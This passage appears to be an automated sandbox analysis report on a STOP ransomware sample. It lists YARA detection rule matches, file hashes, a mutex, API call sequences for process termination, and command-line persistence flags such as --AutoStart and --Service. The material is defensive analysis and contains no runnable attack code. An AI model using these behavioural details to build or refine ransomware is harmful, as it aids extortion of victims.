Source: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7020, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6252, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6684, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPED	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: DROPPED	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111

Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\sdiapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uwfapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\debugport.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blktable.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fveretailunlock.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fvelog.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blockapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\seccmd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fve.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbusapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nkp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\usb.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\disk.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\locate.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\block.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\edriveapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\fileapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udp.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\device.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\serialapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vmbus.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blocksup.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\blkcache.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\uriapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\guiddef.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\tcglib.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\ramdiskvhd.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vdiskapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\devlog.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhdutil.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd2.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\udpapi.objd:\os\public\amd64fre\onecore\internal\minwin\priv_sdk\lib\amd64\boot\efi\device.lib
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\partition.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\nbp.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\diskapi.obj
Source: winload_prod.pdb.2.dr	Binary string: d:\os\obj\amd64fre\minkernel\boot\environ\lib\io\device\efi\objfre\amd64\vhd.obj

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@9/1154@3/2

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00481900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,

0_2_00481900

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00482440 CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,

0_2_00482440

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_0047D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

0_2_0047D240

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\geo[1].json

Jump to behavior

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --ForNetRes	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Task	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --AutoStart	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Service	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: X1W	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x2X	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x*W	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: C:\Windows\	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: D:\Windows\	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: 7W	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: %username%	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: F:\	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --ForNetRes	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Task	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --AutoStart	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Service	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: X1W	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x2X	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x*W	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: C:\Windows\	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: D:\Windows\	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: 7W	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: %username%	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: F:\	0_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --ForNetRes	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsAutoStart	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: IsTask	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Task	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --AutoStart	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Service	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: X1W	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: --Admin	2_2_00489F90
Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Command line argument: x2X	2_2_00489F90
